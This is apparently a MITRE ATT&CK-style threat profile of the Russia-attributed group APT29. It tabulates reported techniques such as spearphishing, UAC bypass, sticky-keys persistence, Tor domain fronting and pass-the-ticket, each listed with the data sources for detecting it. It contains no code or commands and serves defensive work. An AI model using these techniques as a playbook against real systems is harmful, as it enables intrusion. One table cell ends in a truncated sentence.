APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)
| Platform | Tactic | Technique | Description | Data Sources |
|---|---|---|---|---|
| Linux, macOS, Windows | defense-evasion | Indicator Removal on Host | APT29 used SDelete to remove artifacts from victims. | File monitoring, Process monitoring, Process command-line parameters, API monitoring, Windows event logs |
| Windows | persistence | Shortcut Modification | APT29 drops a Windows shortcut file for execution. | File monitoring, Process monitoring, Process command-line parameters |
| Linux, macOS, Windows | defense-evasion | Obfuscated Files or Information | APT29 uses PowerShell to use Base64 for obfuscation. | Network protocol analysis, Process use of network, File monitoring, Malware reverse engineering, Binary file metadata, Process command-line parameters, Environment variable, Process monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL/TLS inspection |
| Windows | defense-evasion, execution | Rundll32 | APT29 has used rundll32.exe for execution. | File monitoring, Process monitoring, Process command-line parameters, Binary file metadata |
| Linux, macOS, Windows | command-and-control | Commonly Used Port | APT29 has used Port Number 443 for C2. | Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring |
| Windows, Linux, macOS | command-and-control | Standard Non-Application Layer Protocol | APT29 uses TCP for C2 communications. | Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network |
| Linux, Windows, macOS | execution | User Execution | APT29 has used various forms of spearphishing attempting to get a user to open links or attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files. | Anti-virus, Process command-line parameters, Process monitoring |
| Linux, Windows, macOS | execution | Exploitation for Client Execution | APT29 has used multiple software exploits for common client software, like Microsoft Word and Adobe Reader, to gain code execution as part of. | Anti-virus, System calls, Process monitoring |
| Windows, macOS, Linux | initial-access | Spearphishing Attachment | APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims. | File monitoring, Packet capture, Network intrusion detection system, Detonation chamber, Email gateway, Mail server |
| Windows, macOS, Linux, Office 365, SaaS | initial-access | Spearphishing Link | APT29 has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files. | Packet capture, Web proxy, Email gateway, Detonation chamber, SSL/TLS inspection, DNS records, Mail server |
| Linux, macOS, Windows | command-and-control | Domain Fronting | APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic. | SSL/TLS inspection, Packet capture |
| Linux, macOS, Windows | command-and-control | Multi-hop Proxy | A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network. | Network protocol analysis, Netflow/Enclave netflow |
| Windows | defense-evasion, privilege-escalation | Bypass User Account Control | APT29 has bypassed UAC. | System calls, Process monitoring, Authentication logs, Process command-line parameters |
| Windows | persistence, privilege-escalation | Accessibility Features | APT29 used sticky-keys to obtain unauthenticated, privileged console access. | Windows Registry, File monitoring, Process monitoring |
| Windows | persistence | Registry Run Keys / Startup Folder | APT29 added Registry Run keys to establish persistence. | Windows Registry, File monitoring |
| Windows | lateral-movement | Pass the Ticket | APT29 used Kerberos ticket attacks for lateral movement. | Authentication logs |
| Windows, macOS | defense-evasion | Software Packing | APT29 used UPX to pack files. | Binary file metadata |
| Windows | persistence | Windows Management Instrumentation Event Subscription | APT29 has used WMI event filters to establish persistence. | WMI Objects |
| Windows | execution | Windows Management Instrumentation | APT29 used WMI to steal credentials and execute backdoors at a future time. | Authentication logs, Netflow/Enclave netflow, Process monitoring, Process command-line parameters |
| Windows | execution, persistence, privilege-escalation | Scheduled Task | APT29 used named and hijacked scheduled tasks to establish persistence. | File monitoring, Process monitoring, Process command-line parameters, Windows event logs |
| Linux, macOS, Windows | defense-evasion, execution | Scripting | APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke, as well as to evade defenses. | Process monitoring, File monitoring, Process command-line parameters |
| Windows | execution | PowerShell | APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke. APT29 also used PowerShell scripts to evade defenses. | PowerShell logs, Loaded DLLs, DLL monitoring, Windows Registry, File monitoring, Process monitoring, Process command-line parameters |
| Linux, macOS, Windows | defense-evasion | File Deletion | APT29 used SDelete to remove artifacts from victims. | File monitoring, Process command-line parameters, Binary file metadata |